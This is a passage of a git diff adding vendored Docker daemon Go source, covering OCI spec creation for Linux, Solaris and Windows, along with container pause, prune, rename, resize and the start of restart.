+	if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil {
+		return err
+	}
+	cwd := c.Config.WorkingDir
+	if len(cwd) == 0 {
+		cwd = "/"
+	}
+	s.Process.Args = append([]string{c.Path}, c.Args...)
+
+	// only add the custom init if it is specified and the container is running in its
+	// own private pid namespace.  It does not make sense to add if it is running in the
+	// host namespace or another container's pid namespace where we already have an init
+	if c.HostConfig.PidMode.IsPrivate() {
+		if (c.HostConfig.Init != nil && *c.HostConfig.Init) ||
+			(c.HostConfig.Init == nil && daemon.configStore.Init) {
+			s.Process.Args = append([]string{"/dev/init", "--", c.Path}, c.Args...)
+			var path string
+			if daemon.configStore.InitPath == "" && c.HostConfig.InitPath == "" {
+				path, err = exec.LookPath(DefaultInitBinary)
+				if err != nil {
+					return err
+				}
+			}
+			if daemon.configStore.InitPath != "" {
+				path = daemon.configStore.InitPath
+			}
+			if c.HostConfig.InitPath != "" {
+				path = c.HostConfig.InitPath
+			}
+			s.Mounts = append(s.Mounts, specs.Mount{
+				Destination: "/dev/init",
+				Type:        "bind",
+				Source:      path,
+				Options:     []string{"bind", "ro"},
+			})
+		}
+	}
+	s.Process.Cwd = cwd
+	s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv)
+	s.Process.Terminal = c.Config.Tty
+	s.Hostname = c.FullHostname()
+
+	return nil
+}
+
+func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
+	s := oci.DefaultSpec()
+	if err := daemon.populateCommonSpec(&s, c); err != nil {
+		return nil, err
+	}
+
+	var cgroupsPath string
+	scopePrefix := "docker"
+	parent := "/docker"
+	useSystemd := UsingSystemd(daemon.configStore)
+	if useSystemd {
+		parent = "system.slice"
+	}
+
+	if c.HostConfig.CgroupParent != "" {
+		parent = c.HostConfig.CgroupParent
+	} else if daemon.configStore.CgroupParent != "" {
+		parent = daemon.configStore.CgroupParent
+	}
+
+	if useSystemd {
+		cgroupsPath = parent + ":" + scopePrefix + ":" + c.ID
+		logrus.Debugf("createSpec: cgroupsPath: %s", cgroupsPath)
+	} else {
+		cgroupsPath = filepath.Join(parent, c.ID)
+	}
+	s.Linux.CgroupsPath = &cgroupsPath
+
+	if err := setResources(&s, c.HostConfig.Resources); err != nil {
+		return nil, fmt.Errorf("linux runtime spec resources: %v", err)
+	}
+	s.Linux.Resources.OOMScoreAdj = &c.HostConfig.OomScoreAdj
+	s.Linux.Sysctl = c.HostConfig.Sysctls
+
+	p := *s.Linux.CgroupsPath
+	if useSystemd {
+		initPath, err := cgroups.GetInitCgroupDir("cpu")
+		if err != nil {
+			return nil, err
+		}
+		p, _ = cgroups.GetThisCgroupDir("cpu")
+		if err != nil {
+			return nil, err
+		}
+		p = filepath.Join(initPath, p)
+	}
+
+	// Clean path to guard against things like ../../../BAD
+	parentPath := filepath.Dir(p)
+	if !filepath.IsAbs(parentPath) {
+		parentPath = filepath.Clean("/" + parentPath)
+	}
+
+	if err := daemon.initCgroupsPath(parentPath); err != nil {
+		return nil, fmt.Errorf("linux init cgroups path: %v", err)
+	}
+	if err := setDevices(&s, c); err != nil {
+		return nil, fmt.Errorf("linux runtime spec devices: %v", err)
+	}
+	if err := setRlimits(daemon, &s, c); err != nil {
+		return nil, fmt.Errorf("linux runtime spec rlimits: %v", err)
+	}
+	if err := setUser(&s, c); err != nil {
+		return nil, fmt.Errorf("linux spec user: %v", err)
+	}
+	if err := setNamespaces(daemon, &s, c); err != nil {
+		return nil, fmt.Errorf("linux spec namespaces: %v", err)
+	}
+	if err := setCapabilities(&s, c); err != nil {
+		return nil, fmt.Errorf("linux spec capabilities: %v", err)
+	}
+	if err := setSeccomp(daemon, &s, c); err != nil {
+		return nil, fmt.Errorf("linux seccomp: %v", err)
+	}
+
+	if err := daemon.setupIpcDirs(c); err != nil {
+		return nil, err
+	}
+
+	if err := daemon.setupSecretDir(c); err != nil {
+		return nil, err
+	}
+
+	ms, err := daemon.setupMounts(c)
+	if err != nil {
+		return nil, err
+	}
+
+	ms = append(ms, c.IpcMounts()...)
+
+	tmpfsMounts, err := c.TmpfsMounts()
+	if err != nil {
+		return nil, err
+	}
+	ms = append(ms, tmpfsMounts...)
+
+	if m := c.SecretMount(); m != nil {
+		ms = append(ms, *m)
+	}
+
+	sort.Sort(mounts(ms))
+	if err := setMounts(daemon, &s, c, ms); err != nil {
+		return nil, fmt.Errorf("linux mounts: %v", err)
+	}
+
+	for _, ns := range s.Linux.Namespaces {
+		if ns.Type == "network" && ns.Path == "" && !c.Config.NetworkDisabled {
+			target, err := os.Readlink(filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe"))
+			if err != nil {
+				return nil, err
+			}
+
+			s.Hooks = specs.Hooks{
+				Prestart: []specs.Hook{{
+					Path: target, // FIXME: cross-platform
+					Args: []string{"libnetwork-setkey", c.ID, daemon.netController.ID()},
+				}},
+			}
+		}
+	}
+
+	if apparmor.IsEnabled() {
+		var appArmorProfile string
+		if c.AppArmorProfile != "" {
+			appArmorProfile = c.AppArmorProfile
+		} else if c.HostConfig.Privileged {
+			appArmorProfile = "unconfined"
+		} else {
+			appArmorProfile = "docker-default"
+		}
+
+		if appArmorProfile == "docker-default" {
+			// Unattended upgrades and other fun services can unload AppArmor
+			// profiles inadvertently. Since we cannot store our profile in
+			// /etc/apparmor.d, nor can we practically add other ways of
+			// telling the system to keep our profile loaded, in order to make
+			// sure that we keep the default profile enabled we dynamically
+			// reload it if necessary.
+			if err := ensureDefaultAppArmorProfile(); err != nil {
+				return nil, err
+			}
+		}
+
+		s.Process.ApparmorProfile = appArmorProfile
+	}
+	s.Process.SelinuxLabel = c.GetProcessLabel()
+	s.Process.NoNewPrivileges = c.NoNewPrivileges
+	s.Linux.MountLabel = c.MountLabel
+
+	return (*specs.Spec)(&s), nil
+}
+
+func clearReadOnly(m *specs.Mount) {
+	var opt []string
+	for _, o := range m.Options {
+		if o != "ro" {
+			opt = append(opt, o)
+		}
+	}
+	m.Options = opt
+}
+
+// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig
+func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) {
+	ulimits := c.Ulimits
+	// Merge ulimits with daemon defaults
+	ulIdx := make(map[string]struct{})
+	for _, ul := range ulimits {
+		ulIdx[ul.Name] = struct{}{}
+	}
+	for name, ul := range daemon.configStore.Ulimits {
+		if _, exists := ulIdx[name]; !exists {
+			ulimits = append(ulimits, ul)
+		}
+	}
+	c.Ulimits = ulimits
+}
diff --git a/vendor/github.com/docker/docker/daemon/oci_solaris.go b/vendor/github.com/docker/docker/daemon/oci_solaris.go
new file mode 100644
index 0000000000..0c757f9196
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/oci_solaris.go
@@ -0,0 +1,188 @@
+package daemon
+
+import (
+	"fmt"
+	"path/filepath"
+	"sort"
+	"strconv"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/oci"
+	"github.com/docker/libnetwork"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func setResources(s *specs.Spec, r containertypes.Resources) error {
+	mem := getMemoryResources(r)
+	s.Solaris.CappedMemory = &mem
+
+	capCPU := getCPUResources(r)
+	s.Solaris.CappedCPU = &capCPU
+
+	return nil
+}
+
+func setUser(s *specs.Spec, c *container.Container) error {
+	uid, gid, additionalGids, err := getUser(c, c.Config.User)
+	if err != nil {
+		return err
+	}
+	s.Process.User.UID = uid
+	s.Process.User.GID = gid
+	s.Process.User.AdditionalGids = additionalGids
+	return nil
+}
+
+func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) {
+	return 0, 0, nil, nil
+}
+
+func (daemon *Daemon) getRunzAnet(ep libnetwork.Endpoint) (specs.Anet, error) {
+	var (
+		linkName  string
+		lowerLink string
+		defRouter string
+	)
+
+	epInfo := ep.Info()
+	if epInfo == nil {
+		return specs.Anet{}, fmt.Errorf("invalid endpoint")
+	}
+
+	nw, err := daemon.GetNetworkByName(ep.Network())
+	if err != nil {
+		return specs.Anet{}, fmt.Errorf("Failed to get network %s: %v", ep.Network(), err)
+	}
+
+	// Evaluate default router, linkname and lowerlink for interface endpoint
+	switch nw.Type() {
+	case "bridge":
+		defRouter = epInfo.Gateway().String()
+		linkName = "net0" // Should always be net0 for a container
+
+		// TODO We construct lowerlink here exactly as done for solaris bridge
+		// initialization. Need modular code to reuse.
+		options := nw.Info().DriverOptions()
+		nwName := options["com.docker.network.bridge.name"]
+		lastChar := nwName[len(nwName)-1:]
+		if _, err = strconv.Atoi(lastChar); err != nil {
+			lowerLink = nwName + "_0"
+		} else {
+			lowerLink = nwName
+		}
+
+	case "overlay":
+		defRouter = ""
+		linkName = "net1"
+
+		// TODO Follows generateVxlanName() in solaris overlay.
+		id := nw.ID()
+		if len(nw.ID()) > 12 {
+			id = nw.ID()[:12]
+		}
+		lowerLink = "vx_" + id + "_0"
+	}
+
+	runzanet := specs.Anet{
+		Linkname:          linkName,
+		Lowerlink:         lowerLink,
+		Allowedaddr:       epInfo.Iface().Address().String(),
+		Configallowedaddr: "true",
+		Defrouter:         defRouter,
+		Linkprotection:    "mac-nospoof, ip-nospoof",
+		Macaddress:        epInfo.Iface().MacAddress().String(),
+	}
+
+	return runzanet, nil
+}
+
+func (daemon *Daemon) setNetworkInterface(s *specs.Spec, c *container.Container) error {
+	var anets []specs.Anet
+
+	sb, err := daemon.netController.SandboxByID(c.NetworkSettings.SandboxID)
+	if err != nil {
+		return fmt.Errorf("Could not obtain sandbox for container")
+	}
+
+	// Populate interfaces required for each endpoint
+	for _, ep := range sb.Endpoints() {
+		runzanet, err := daemon.getRunzAnet(ep)
+		if err != nil {
+			return fmt.Errorf("Failed to get interface information for endpoint %d: %v", ep.ID(), err)
+		}
+		anets = append(anets, runzanet)
+	}
+
+	s.Solaris.Anet = anets
+	if anets != nil {
+		s.Solaris.Milestone = "svc:/milestone/container:default"
+	}
+	return nil
+}
+
+func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error {
+	linkedEnv, err := daemon.setupLinkedContainers(c)
+	if err != nil {
+		return err
+	}
+	s.Root = specs.Root{
+		Path:     filepath.Dir(c.BaseFS),
+		Readonly: c.HostConfig.ReadonlyRootfs,
+	}
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil {
+		return err
+	}
+	cwd := c.Config.WorkingDir
+	s.Process.Args = append([]string{c.Path}, c.Args...)
+	s.Process.Cwd = cwd
+	s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv)
+	s.Process.Terminal = c.Config.Tty
+	s.Hostname = c.FullHostname()
+
+	return nil
+}
+
+func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
+	s := oci.DefaultSpec()
+	if err := daemon.populateCommonSpec(&s, c); err != nil {
+		return nil, err
+	}
+
+	if err := setResources(&s, c.HostConfig.Resources); err != nil {
+		return nil, fmt.Errorf("runtime spec resources: %v", err)
+	}
+
+	if err := setUser(&s, c); err != nil {
+		return nil, fmt.Errorf("spec user: %v", err)
+	}
+
+	if err := daemon.setNetworkInterface(&s, c); err != nil {
+		return nil, err
+	}
+
+	if err := daemon.setupIpcDirs(c); err != nil {
+		return nil, err
+	}
+
+	ms, err := daemon.setupMounts(c)
+	if err != nil {
+		return nil, err
+	}
+	ms = append(ms, c.IpcMounts()...)
+	tmpfsMounts, err := c.TmpfsMounts()
+	if err != nil {
+		return nil, err
+	}
+	ms = append(ms, tmpfsMounts...)
+	sort.Sort(mounts(ms))
+
+	return (*specs.Spec)(&s), nil
+}
+
+// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig
+// It will do nothing on non-Linux platform
+func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) {
+	return
+}
diff --git a/vendor/github.com/docker/docker/daemon/oci_windows.go b/vendor/github.com/docker/docker/daemon/oci_windows.go
new file mode 100644
index 0000000000..6e264243b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/oci_windows.go
@@ -0,0 +1,122 @@
+package daemon
+
+import (
+	"syscall"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/oci"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
+	s := oci.DefaultSpec()
+
+	linkedEnv, err := daemon.setupLinkedContainers(c)
+	if err != nil {
+		return nil, err
+	}
+
+	// Note, unlike Unix, we do NOT call into SetupWorkingDirectory as
+	// this is done in VMCompute. Further, we couldn't do it for Hyper-V
+	// containers anyway.
+
+	// In base spec
+	s.Hostname = c.FullHostname()
+
+	// In s.Mounts
+	mounts, err := daemon.setupMounts(c)
+	if err != nil {
+		return nil, err
+	}
+	for _, mount := range mounts {
+		m := specs.Mount{
+			Source:      mount.Source,
+			Destination: mount.Destination,
+		}
+		if !mount.Writable {
+			m.Options = append(m.Options, "ro")
+		}
+		s.Mounts = append(s.Mounts, m)
+	}
+
+	// In s.Process
+	s.Process.Args = append([]string{c.Path}, c.Args...)
+	if !c.Config.ArgsEscaped {
+		s.Process.Args = escapeArgs(s.Process.Args)
+	}
+	s.Process.Cwd = c.Config.WorkingDir
+	if len(s.Process.Cwd) == 0 {
+		// We default to C:\ to workaround the oddity of the case that the
+		// default directory for cmd running as LocalSystem (or
+		// ContainerAdministrator) is c:\windows\system32. Hence docker run
+		// <image> cmd will by default end in c:\windows\system32, rather
+		// than 'root' (/) on Linux. The oddity is that if you have a dockerfile
+		// which has no WORKDIR and has a COPY file ., . will be interpreted
+		// as c:\. Hence, setting it to default of c:\ makes for consistency.
+		s.Process.Cwd = `C:\`
+	}
+	s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv)
+	s.Process.ConsoleSize.Height = c.HostConfig.ConsoleSize[0]
+	s.Process.ConsoleSize.Width = c.HostConfig.ConsoleSize[1]
+	s.Process.Terminal = c.Config.Tty
+	s.Process.User.Username = c.Config.User
+
+	// In spec.Root. This is not set for Hyper-V containers
+	isHyperV := false
+	if c.HostConfig.Isolation.IsDefault() {
+		// Container using default isolation, so take the default from the daemon configuration
+		isHyperV = daemon.defaultIsolation.IsHyperV()
+	} else {
+		// Container may be requesting an explicit isolation mode.
+		isHyperV = c.HostConfig.Isolation.IsHyperV()
+	}
+	if !isHyperV {
+		s.Root.Path = c.BaseFS
+	}
+	s.Root.Readonly = false // Windows does not support a read-only root filesystem
+
+	// In s.Windows.Resources
+	// @darrenstahlmsft implement these resources
+	cpuShares := uint16(c.HostConfig.CPUShares)
+	cpuPercent := uint8(c.HostConfig.CPUPercent)
+	if c.HostConfig.NanoCPUs > 0 {
+		cpuPercent = uint8(c.HostConfig.NanoCPUs * 100 / int64(sysinfo.NumCPU()) / 1e9)
+	}
+	cpuCount := uint64(c.HostConfig.CPUCount)
+	memoryLimit := uint64(c.HostConfig.Memory)
+	s.Windows.Resources = &specs.WindowsResources{
+		CPU: &specs.WindowsCPUResources{
+			Percent: &cpuPercent,
+			Shares:  &cpuShares,
+			Count:   &cpuCount,
+		},
+		Memory: &specs.WindowsMemoryResources{
+			Limit: &memoryLimit,
+			//TODO Reservation: ...,
+		},
+		Network: &specs.WindowsNetworkResources{
+		//TODO Bandwidth: ...,
+		},
+		Storage: &specs.WindowsStorageResources{
+			Bps:  &c.HostConfig.IOMaximumBandwidth,
+			Iops: &c.HostConfig.IOMaximumIOps,
+		},
+	}
+	return (*specs.Spec)(&s), nil
+}
+
+func escapeArgs(args []string) []string {
+	escapedArgs := make([]string, len(args))
+	for i, a := range args {
+		escapedArgs[i] = syscall.EscapeArg(a)
+	}
+	return escapedArgs
+}
+
+// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig
+// It will do nothing on non-Linux platform
+func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) {
+	return
+}
diff --git a/vendor/github.com/docker/docker/daemon/pause.go b/vendor/github.com/docker/docker/daemon/pause.go
new file mode 100644
index 0000000000..dbfafbc5fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/pause.go
@@ -0,0 +1,49 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/container"
+)
+
+// ContainerPause pauses a container
+func (daemon *Daemon) ContainerPause(name string) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	if err := daemon.containerPause(container); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// containerPause pauses the container execution without stopping the process.
+// The execution can be resumed by calling containerUnpause.
+func (daemon *Daemon) containerPause(container *container.Container) error {
+	container.Lock()
+	defer container.Unlock()
+
+	// We cannot Pause the container which is not running
+	if !container.Running {
+		return errNotRunning{container.ID}
+	}
+
+	// We cannot Pause the container which is already paused
+	if container.Paused {
+		return fmt.Errorf("Container %s is already paused", container.ID)
+	}
+
+	// We cannot Pause the container which is restarting
+	if container.Restarting {
+		return errContainerIsRestarting(container.ID)
+	}
+
+	if err := daemon.containerd.Pause(container.ID); err != nil {
+		return fmt.Errorf("Cannot pause container %s: %s", container.ID, err)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/prune.go b/vendor/github.com/docker/docker/daemon/prune.go
new file mode 100644
index 0000000000..a693beb4e1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/prune.go
@@ -0,0 +1,236 @@
+package daemon
+
+import (
+	"fmt"
+	"regexp"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/docker/volume"
+	"github.com/docker/libnetwork"
+)
+
+// ContainersPrune removes unused containers
+func (daemon *Daemon) ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) {
+	rep := &types.ContainersPruneReport{}
+
+	allContainers := daemon.List()
+	for _, c := range allContainers {
+		if !c.IsRunning() {
+			cSize, _ := daemon.getSize(c)
+			// TODO: sets RmLink to true?
+			err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{})
+			if err != nil {
+				logrus.Warnf("failed to prune container %s: %v", c.ID, err)
+				continue
+			}
+			if cSize > 0 {
+				rep.SpaceReclaimed += uint64(cSize)
+			}
+			rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID)
+		}
+	}
+
+	return rep, nil
+}
+
+// VolumesPrune removes unused local volumes
+func (daemon *Daemon) VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) {
+	rep := &types.VolumesPruneReport{}
+
+	pruneVols := func(v volume.Volume) error {
+		name := v.Name()
+		refs := daemon.volumes.Refs(v)
+
+		if len(refs) == 0 {
+			vSize, err := directory.Size(v.Path())
+			if err != nil {
+				logrus.Warnf("could not determine size of volume %s: %v", name, err)
+			}
+			err = daemon.volumes.Remove(v)
+			if err != nil {
+				logrus.Warnf("could not remove volume %s: %v", name, err)
+				return nil
+			}
+			rep.SpaceReclaimed += uint64(vSize)
+			rep.VolumesDeleted = append(rep.VolumesDeleted, name)
+		}
+
+		return nil
+	}
+
+	err := daemon.traverseLocalVolumes(pruneVols)
+
+	return rep, err
+}
+
+// ImagesPrune removes unused images
+func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) {
+	rep := &types.ImagesPruneReport{}
+
+	danglingOnly := true
+	if pruneFilters.Include("dangling") {
+		if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") {
+			danglingOnly = false
+		} else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") {
+			return nil, fmt.Errorf("Invalid filter 'dangling=%s'", pruneFilters.Get("dangling"))
+		}
+	}
+
+	var allImages map[image.ID]*image.Image
+	if danglingOnly {
+		allImages = daemon.imageStore.Heads()
+	} else {
+		allImages = daemon.imageStore.Map()
+	}
+	allContainers := daemon.List()
+	imageRefs := map[string]bool{}
+	for _, c := range allContainers {
+		imageRefs[c.ID] = true
+	}
+
+	// Filter intermediary images and get their unique size
+	allLayers := daemon.layerStore.Map()
+	topImages := map[image.ID]*image.Image{}
+	for id, img := range allImages {
+		dgst := digest.Digest(id)
+		if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 {
+			continue
+		}
+		topImages[id] = img
+	}
+
+	for id := range topImages {
+		dgst := digest.Digest(id)
+		hex := dgst.Hex()
+		if _, ok := imageRefs[hex]; ok {
+			continue
+		}
+
+		deletedImages := []types.ImageDelete{}
+		refs := daemon.referenceStore.References(dgst)
+		if len(refs) > 0 {
+			if danglingOnly {
+				// Not a dangling image
+				continue
+			}
+
+			nrRefs := len(refs)
+			for _, ref := range refs {
+				// If nrRefs == 1, we have an image marked as myreponame:<none>
+				// i.e. the tag content was changed
+				if _, ok := ref.(reference.Canonical); ok && nrRefs > 1 {
+					continue
+				}
+				imgDel, err := daemon.ImageDelete(ref.String(), false, true)
+				if err != nil {
+					logrus.Warnf("could not delete reference %s: %v", ref.String(), err)
+					continue
+				}
+				deletedImages = append(deletedImages, imgDel...)
+			}
+		} else {
+			imgDel, err := daemon.ImageDelete(hex, false, true)
+			if err != nil {
+				logrus.Warnf("could not delete image %s: %v", hex, err)
+				continue
+			}
+			deletedImages = append(deletedImages, imgDel...)
+		}
+
+		rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...)
+	}
+
+	// Compute how much space was freed
+	for _, d := range rep.ImagesDeleted {
+		if d.Deleted != "" {
+			chid := layer.ChainID(d.Deleted)
+			if l, ok := allLayers[chid]; ok {
+				diffSize, err := l.DiffSize()
+				if err != nil {
+					logrus.Warnf("failed to get layer %s size: %v", chid, err)
+					continue
+				}
+				rep.SpaceReclaimed += uint64(diffSize)
+			}
+		}
+	}
+
+	return rep, nil
+}
+
+// localNetworksPrune removes unused local networks
+func (daemon *Daemon) localNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
+	rep := &types.NetworksPruneReport{}
+	var err error
+	// When the function returns true, the walk will stop.
+	l := func(nw libnetwork.Network) bool {
+		nwName := nw.Name()
+		predefined := runconfig.IsPreDefinedNetwork(nwName)
+		if !predefined && len(nw.Endpoints()) == 0 {
+			if err = daemon.DeleteNetwork(nw.ID()); err != nil {
+				logrus.Warnf("could not remove network %s: %v", nwName, err)
+				return false
+			}
+			rep.NetworksDeleted = append(rep.NetworksDeleted, nwName)
+		}
+		return false
+	}
+	daemon.netController.WalkNetworks(l)
+	return rep, err
+}
+
+// clusterNetworksPrune removes unused cluster networks
+func (daemon *Daemon) clusterNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
+	rep := &types.NetworksPruneReport{}
+	cluster := daemon.GetCluster()
+	networks, err := cluster.GetNetworks()
+	if err != nil {
+		return rep, err
+	}
+	networkIsInUse := regexp.MustCompile(`network ([[:alnum:]]+) is in use`)
+	for _, nw := range networks {
+		if nw.Name == "ingress" {
+			continue
+		}
+		// https://github.com/docker/docker/issues/24186
+		// `docker network inspect` unfortunately displays ONLY those containers that are local to that node.
+		// So we try to remove it anyway and check the error
+		err = cluster.RemoveNetwork(nw.ID)
+		if err != nil {
+			// we can safely ignore the "network .. is in use" error
+			match := networkIsInUse.FindStringSubmatch(err.Error())
+			if len(match) != 2 || match[1] != nw.ID {
+				logrus.Warnf("could not remove network %s: %v", nw.Name, err)
+			}
+			continue
+		}
+		rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name)
+	}
+	return rep, nil
+}
+
+// NetworksPrune removes unused networks
+func (daemon *Daemon) NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) {
+	rep := &types.NetworksPruneReport{}
+	clusterRep, err := daemon.clusterNetworksPrune(pruneFilters)
+	if err != nil {
+		logrus.Warnf("could not remove cluster networks: %v", err)
+	} else {
+		rep.NetworksDeleted = append(rep.NetworksDeleted, clusterRep.NetworksDeleted...)
+	}
+	localRep, err := daemon.localNetworksPrune(pruneFilters)
+	if err != nil {
+		logrus.Warnf("could not remove local networks: %v", err)
+	} else {
+		rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...)
+	}
+	return rep, err
+}
diff --git a/vendor/github.com/docker/docker/daemon/rename.go b/vendor/github.com/docker/docker/daemon/rename.go
new file mode 100644
index 0000000000..ffb7715f23
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/rename.go
@@ -0,0 +1,122 @@
+package daemon
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	dockercontainer "github.com/docker/docker/container"
+	"github.com/docker/libnetwork"
+)
+
+// ContainerRename changes the name of a container, using the oldName
+// to find the container. An error is returned if newName is already
+// reserved.
+func (daemon *Daemon) ContainerRename(oldName, newName string) error {
+	var (
+		sid string
+		sb  libnetwork.Sandbox
+	)
+
+	if oldName == "" || newName == "" {
+		return fmt.Errorf("Neither old nor new names may be empty")
+	}
+
+	if newName[0] != '/' {
+		newName = "/" + newName
+	}
+
+	container, err := daemon.GetContainer(oldName)
+	if err != nil {
+		return err
+	}
+
+	oldName = container.Name
+	oldIsAnonymousEndpoint := container.NetworkSettings.IsAnonymousEndpoint
+
+	if oldName == newName {
+		return fmt.Errorf("Renaming a container with the same name as its current name")
+	}
+
+	container.Lock()
+	defer container.Unlock()
+
+	links := map[string]*dockercontainer.Container{}
+	for k, v := range daemon.linkIndex.children(container) {
+		if !strings.HasPrefix(k, oldName) {
+			return fmt.Errorf("Linked container %s does not match parent %s", k, oldName)
+		}
+		links[strings.TrimPrefix(k, oldName)] = v
+	}
+
+	if newName, err = daemon.reserveName(container.ID, newName); err != nil {
+		return fmt.Errorf("Error when allocating new name: %v", err)
+	}
+
+	for k, v := range links {
+		daemon.nameIndex.Reserve(newName+k, v.ID)
+		daemon.linkIndex.link(container, v, newName+k)
+	}
+
+	container.Name = newName
+	container.NetworkSettings.IsAnonymousEndpoint = false
+
+	defer func() {
+		if err != nil {
+			container.Name = oldName
+			container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint
+			daemon.reserveName(container.ID, oldName)
+			for k, v := range links {
+				daemon.nameIndex.Reserve(oldName+k, v.ID)
+				daemon.linkIndex.link(container, v, oldName+k)
+				daemon.linkIndex.unlink(newName+k, v, container)
+				daemon.nameIndex.Release(newName + k)
+			}
+			daemon.releaseName(newName)
+		}
+	}()
+
+	for k, v := range links {
+		daemon.linkIndex.unlink(oldName+k, v, container)
+		daemon.nameIndex.Release(oldName + k)
+	}
+	daemon.releaseName(oldName)
+	if err = container.ToDisk(); err != nil {
+		return err
+	}
+
+	attributes := map[string]string{
+		"oldName": oldName,
+	}
+
+	if !container.Running {
+		daemon.LogContainerEventWithAttributes(container, "rename", attributes)
+		return nil
+	}
+
+	defer func() {
+		if err != nil {
+			container.Name = oldName
+			container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint
+			if e := container.ToDisk(); e != nil {
+				logrus.Errorf("%s: Failed in writing to Disk on rename failure: %v", container.ID, e)
+			}
+		}
+	}()
+
+	sid = container.NetworkSettings.SandboxID
+	if daemon.netController != nil {
+		sb, err = daemon.netController.SandboxByID(sid)
+		if err != nil {
+			return err
+		}
+
+		err = sb.Rename(strings.TrimPrefix(container.Name, "/"))
+		if err != nil {
+			return err
+		}
+	}
+
+	daemon.LogContainerEventWithAttributes(container, "rename", attributes)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/resize.go b/vendor/github.com/docker/docker/daemon/resize.go
new file mode 100644
index 0000000000..747353852e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/resize.go
@@ -0,0 +1,40 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/libcontainerd"
+)
+
+// ContainerResize changes the size of the TTY of the process running
+// in the container with the given name to the given height and width.
+func (daemon *Daemon) ContainerResize(name string, height, width int) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	if !container.IsRunning() {
+		return errNotRunning{container.ID}
+	}
+
+	if err = daemon.containerd.Resize(container.ID, libcontainerd.InitFriendlyName, width, height); err == nil {
+		attributes := map[string]string{
+			"height": fmt.Sprintf("%d", height),
+			"width":  fmt.Sprintf("%d", width),
+		}
+		daemon.LogContainerEventWithAttributes(container, "resize", attributes)
+	}
+	return err
+}
+
+// ContainerExecResize changes the size of the TTY of the process
+// running in the exec with the given name to the given height and
+// width.
+func (daemon *Daemon) ContainerExecResize(name string, height, width int) error {
+	ec, err := daemon.getExecConfig(name)
+	if err != nil {
+		return err
+	}
+	return daemon.containerd.Resize(ec.ContainerID, ec.ID, width, height)
+}
diff --git a/vendor/github.com/docker/docker/daemon/restart.go b/vendor/github.com/docker/docker/daemon/restart.go
new file mode 100644
index 0000000000..79292f3752
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/restart.go
@@ -0,0 +1,70 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container"
+)
+
+// ContainerRestart stops and starts a container. It attempts to
+// gracefully stop the container within the given timeout, forcefully
+// stopping it if the timeout is exceeded. If given a negative
+// timeout, ContainerRestart will wait forever until a graceful
+// stop. Returns an error if the container cannot be found, or if
+// there is an underlying error at any stage of the restart.
+func (daemon *Daemon) ContainerRestart(name string, seconds *int) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
